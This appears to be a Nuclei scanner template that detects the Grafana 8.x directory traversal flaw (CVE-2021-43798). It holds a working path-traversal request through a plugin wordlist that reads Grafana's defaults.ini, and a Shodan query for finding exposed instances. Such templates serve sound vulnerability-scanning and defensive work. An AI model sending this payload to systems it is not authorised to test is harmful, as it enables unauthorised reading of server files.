id: grafana-file-read info: name: Grafana 8.x - Local File Inclusion author: z0ne,dhiyaneshDk,jeya.seelan,dwisiswant0,j4vaovo severity: high description: Grafana 8.x is vulnerable to local file inclusion. reference: - https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/ - https://nosec.org/home/detail/4914.html - https://github.com/jas502n/Grafana-VulnTips - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p - https://twitter.com/naglinagli/status/1468155313182416899 - https://nvd.nist.gov/vuln/detail/CVE-2021-43798 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43798 cwe-id: CWE-22 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 325 shodan-query: title:"Grafana" product: grafana vendor: grafana tags: grafana,lfi http: - method: GET path: - "{{BaseURL}}/public/plugins/{{pluginSlug}}/../../../../../conf/defaults.ini" payloads: pluginSlug: helpers/wordlists/grafana-plugins.txt threads: 50 stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "socket = /tmp/grafana.sock" - "http_port" condition: and - type: status status: - 200 # digest: 490a00463044022073bd10bbc5995382ec8c0341dd17b2f76574bb3fe3c5d7bcabd823e9b53a817c022046e04d85a404019c230fe1e39bd7dcbb463497dda3200f461cb7d3ee368f8555:922c64590222798bb761d5b6d8e72950